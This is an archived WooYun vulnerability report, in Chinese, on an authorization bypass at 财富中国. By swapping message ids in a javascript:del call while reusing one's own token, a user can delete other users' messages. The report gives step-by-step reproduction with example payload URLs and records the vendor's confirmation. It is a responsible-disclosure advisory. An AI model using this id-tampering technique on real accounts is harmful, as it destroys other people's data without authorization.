当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057707

漏洞标题:财富中国一处越权操作(绕过token)

相关厂商:财富中国

漏洞作者: 梧桐雨

提交时间:2014-04-19 12:16

修复时间:2014-06-03 12:17

公开时间:2014-06-03 12:17

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-19: 细节已通知厂商并且等待厂商处理中
2014-04-20: 厂商已经确认,细节仅向厂商公开
2014-04-30: 细节向核心白帽子及相关领域专家公开
2014-05-10: 细节向普通白帽子公开
2014-05-20: 细节向实习白帽子公开
2014-06-03: 细节向公众公开

简要描述:

偶尔也来来越权

详细说明:

财富中国一处越权操作,可以删除任意用户短消息。
已读和未读都可以删除哦。
虽然有token,但是真的管用么?:)来看看我的操作。
1:)同时注册2个账户,打开浏览器。
注册完之后注意到了短消息页面的删除按钮:

javascript:del('%E6%82%A8%E7%9C%9F%E7%9A%84%E8%A6%81%E5%88%A0%E9%99%A4%E8%AF%A5%E7%B3%BB%E7%BB%9F%E9%80%9A%E7%9F%A5%EF%BC%9F', '/systemMessage/del', 'id=112469&ai_token=a27cc6ec', '');


是一个执行js函数的操作。
id当然就是你要删除的id了。
2:)直接copy删除的链接过来,不管用(提示token无效)
猜测应该是有对当前用户的token做了判断。
3:)只更改id的情况下,绕过了token判断成功删除:

javascript:del('%E6%82%A8%E7%9C%9F%E7%9A%84%E8%A6%81%E5%88%A0%E9%99%A4%E8%AF%A5%E7%B3%BB%E7%BB%9F%E9%80%9A%E7%9F%A5%EF%BC%9F', '/systemMessage/del', 'id=112476&ai_token=2ec108f7', '');


上面这个是我的第二个号,我把第一个(我自己的账户)修改成:
javascript:del('%E6%82%A8%E7%9C%9F%E7%9A%84%E8%A6%81%E5%88%A0%E9%99%A4%E8%AF%A5%E7%B3%BB%E7%BB%9F%E9%80%9A%E7%9F%A5%EF%BC%9F', '/systemMessage/del', 'id=112476&ai_token=a27cc6ec', '');

漏洞证明:

删除前:

22.jpg


删除之后:

33.jpg


44.jpg

修复方案:

token没起到真正的作用,缺乏真正的校验。

版权声明:转载请注明来源 梧桐雨@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-04-20 17:46

厂商回复:

谢谢,正在处理当中!

最新状态:

暂无